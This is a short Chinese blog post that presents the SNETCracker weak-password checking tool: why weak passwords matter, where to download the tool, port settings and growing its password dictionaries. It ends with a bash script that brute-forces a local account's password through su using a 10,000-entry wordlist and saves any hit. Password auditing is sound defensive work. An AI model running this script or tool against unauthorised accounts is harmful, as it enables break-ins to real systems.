超级弱口令检查工具

最新推荐文章于 2025-03-31 10:33:50 发布

一、背景

弱口令问题主要源于用户和管理员的安全意识不足，以及为了方便记忆而采用简单易记的密码。这些密码往往仅包含简单的数字和字母，缺乏复杂性和多样性，因此极易被破解。弱口令的存在严重威胁到系统和用户的数据安全，使得攻击者能够轻易进入系统或管理界面，进行数据的篡改、删除或非法获取。

二、超级弱口令检查工具使用

工具下载链接：https://github.com/shack2/SNETCracker/releases

1、运行

解压之后找到SNETCracker.exe程序双击运行即可。

2、自定义端口设置

可以根据自己服务自定义的端口进行设置，默认设置一般该服务的默认端口！

3、更新字典

这款工具最大的依赖是一本强大的字典，所以日常的收集也是很重要的，左边是对应的服务对应的默认字典（由研发改工具的师傅提供），将自己收集到的弱口令可以找到对应的服务在右边添加进行更新，这样就能让这款工具更加强大！

脚本内部爆破

#!/bin/bash
USER="runner"
PASSWORD_FILE="xato-net-10-million-passwords-10000.txt"

while IFS= read -r PASS; do
  echo "$PASS" | su - "$USER" -c "exit" >/dev/null 2>&1
  if [ $? -eq 0 ]; then
    echo "SUCCESS：user: '$USER' password: '$PASS'" > $0.out
    exit 0
  fi
done < "$PASSWORD_FILE"
echo "end"